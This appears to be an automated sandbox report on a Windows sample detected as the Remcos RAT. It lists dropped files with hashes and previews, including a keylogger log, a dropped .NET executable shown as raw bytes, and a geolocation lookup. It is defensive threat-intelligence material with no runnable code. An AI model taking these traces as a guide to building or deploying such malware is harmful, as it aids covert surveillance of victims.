                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):31162
                                                                                                                                                                                            Entropy (8bit):3.5778823506708664
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:3ukuuuMuruIuBuDuLcuVu1iuCuXunuWuBuXBFuhiTuyug/umux+uTKmu1u8uKu7o:bSwBolKDRmFcCCUXStV3
                                                                                                                                                                                            MD5:30E79B41875CEDC8D308F829C872C422
                                                                                                                                                                                            SHA1:415F3D7802AD7398CE54B8F01D2F1FB4A23EF585
                                                                                                                                                                                            SHA-256:D607E237A69B569FA3B6A47618A0D9E312D4C4FCFAC209763BE0AF60EE08280C
                                                                                                                                                                                            SHA-512:1E14493B6727F977607EC61ECC7A4D8391A3A10D32BD157C634AB838AA25D3A8E9FC18D975EC53662ED7FCAB1BBC5DF23A09119BC7923EF1525316C040E32C9D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\graias\logs.dat, Author: Joe Security
                                                                                                                                                                                            Preview:....[.2.0.2.5./.0.1./.0.4. .1.2.:.4.1.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.1.:.5.6. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].....[.W.i.n.].r.....[.2.0.2.5./.0.1./.0.4. .1.2.:.4.1.:.5.7. .R.u.n.].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.1.:.5.8. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.0. .R.u.n.].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.0. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.1. .U.n.t.i.t.l.e.d. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.2. .s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.2.0.2.5./.0.1./.0.4. .1.2.:.4.2.:.0.4. .
                                                                                                                                                                                            Process:C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):1216
                                                                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):1216
                                                                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                                            Entropy (8bit):5.019506780280991
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzd:qlupdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                            MD5:7459F6DA71CD5EAF9DBE2D20CA9434AC
                                                                                                                                                                                            SHA1:4F60E33E15277F7A632D8CD058EC7DF4728B40BC
                                                                                                                                                                                            SHA-256:364A445C3A222EE10A8816F78283BBD0503A5E5824B2A7F5DCD8E6DA9148AF6A
                                                                                                                                                                                            SHA-512:3A862711D78F6F97F07E01ACC0DCB54F595A23AACEA9F2BB9606382805E1E92C1ACE09E1446F312F3B6D4EE63435ABEF46F0C16F015BD505347A1BCF2E149841
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):2232
                                                                                                                                                                                            Entropy (8bit):5.380285623575084
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:+WSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zr0Uyus:+LHxvCsIfA2KRHmOugs1s
                                                                                                                                                                                            MD5:B7D8DBE281BCAF10437E6D76C2139747
                                                                                                                                                                                            SHA1:2DC80C630D1A78AF4AAFAF5915BB65061795C6D4
                                                                                                                                                                                            SHA-256:3DB2059FF44A96483D33493BC8964AB8A4BC3AB7BC580EEBF656D7F127693F5E
                                                                                                                                                                                            SHA-512:61447D2DE53AD8EBA2C34C1E284275CE2A0665CE4FCB29A159418E1220AE433A90FD9C36E95650F6663471D393486EF0C6671CA1A4FA6CDCB5A30EBCE3304CB1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):985600
                                                                                                                                                                                            Entropy (8bit):7.901211828464333
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:fdFeteG2H+FLBvmhCWWmLiUZklZGIo/KCrB:FA9w+bvmhCWWpUZkbDo5rB
                                                                                                                                                                                            MD5:4A9440BAA61BE8363A372B0BBC5933AD
                                                                                                                                                                                            SHA1:9AA5380DC87829C6FA22E9029CADCAB9F6221EF9
                                                                                                                                                                                            SHA-256:51C0BCBC40451C10E3B56DF10853156378E8DBFB32EE63EA936737D42818822C
                                                                                                                                                                                            SHA-512:648BD4434CE14E15C3FABA25945525FFFEC6DAD028E8FE26982D70096CCD448CA6E114E10739B1E990EA65970DB97897713B8054450F1CD98C9AACB596436B0C
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....tg..............0......$......R.... ... ....@.. ....................................@.....................................O.... ...!...................`....................................................... ............... ..H............text...x.... ...................... ..`.rsrc....!... ..."..................@..@.reloc.......`......................@..B................4.......H........;.../......N...`k...............................................0..j..........|....(.....|....(....(.....{.....+?..%(.....o.......(....X(......%(.....o.......(....X(.....{......-..*...0..5........{....o.....+...(.....o=.....(....-...........o.....*............&.......0..N........{....,?.{....o.....+...(.....}......(....-...........o......{....o.....{....*...................0..Y........{.....o .....o.......(.....(.......(....Y.o.......(.....(.......(....Ys....o......}
                                                                                                                                                                                            Process:C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                            Entropy (8bit):4.468681999604878
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:AIXfpi67eLPU9skLmb0b4AWSPKaJG8nAgejZMMhA2gX4WABl0uNrdwBCswSbNI:FXD94AWlLZMM6YFHl+N
                                                                                                                                                                                            MD5:E6B4BD84A620703D003F703C6B6828EA
SHA1:30305245C893CFE123008FB1DD8AB19D30CEE5F4
SHA-256:A53B3BB5F1B711F916214786659272BC1CA5A70821E577F352F33BC2E4E98A23
SHA-512:D4383E3114ED4AE1E428B63F71EA5205391DA0F8DCB714089E74CA1B5FE9609582828427CC5DACDA7E63CF6E9BCCA51196596562C0A8BCBD74BC07141118F904
Malicious:false
Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....^.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):13339
Entropy (8bit):7.683569563478597
Encrypted:false
SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:512625CF8F40021445D74253DC7C28C0
SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:false
Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):1432
Entropy (8bit):4.986131881931089
Encrypted:false
SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:6B8763B76F400DC480450FD69072F215
SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:false
Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):18367
Entropy (8bit):7.7772261735974215
Encrypted:false
SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:240C4CC15D9FD65405BB642AB81BE615
SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:false
URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:SVG Scalable Vector Graphics image
Category:dropped
Size (bytes):1154
Entropy (8bit):4.59126408969148
Encrypted:false
SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:37258A983459AE1C2E4F1E551665F388
SHA1:603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:false
Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):3130
Entropy (8bit):4.790069981348324
Encrypted:false
SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:EBA6E81304F2F555E1D2EA3126A18A41
SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:false
Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):15427
Entropy (8bit):7.784472070227724
Encrypted:false
SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:3062488F9D119C0D79448BE06ED140D8
SHA1:8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:false
Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
Category:downloaded
Size (bytes):47062
Entropy (8bit):5.016149588804727
Encrypted:false
SSDEEP:768:haAq16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTKGLlO6eAbTIr4audZqBkZRLg
MD5:1FF4CE3C1DB69A5146B03AD8BE62F5EB
SHA1:5D177F6D11FCFF2BD62E61983383BB39D9F045E4
SHA-256:222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
SHA-512:36D198120D83AA9BDC2E74F80B99E2219EE4F03A8DD93A1E58A9E30BD48E829E5220A9F5FE6FC29B3810ED85005A8DCD0EAD04EE06DCCD0A15CD6D080E88641D
Malicious:false
URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with no line terminators
Category:downloaded
Size (bytes):16
Entropy (8bit):3.875
Encrypted:false
SSDEEP:3:HMB:k
MD5:0B04EA412F8FC88B51398B1CBF38110E
SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
Malicious:false
URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
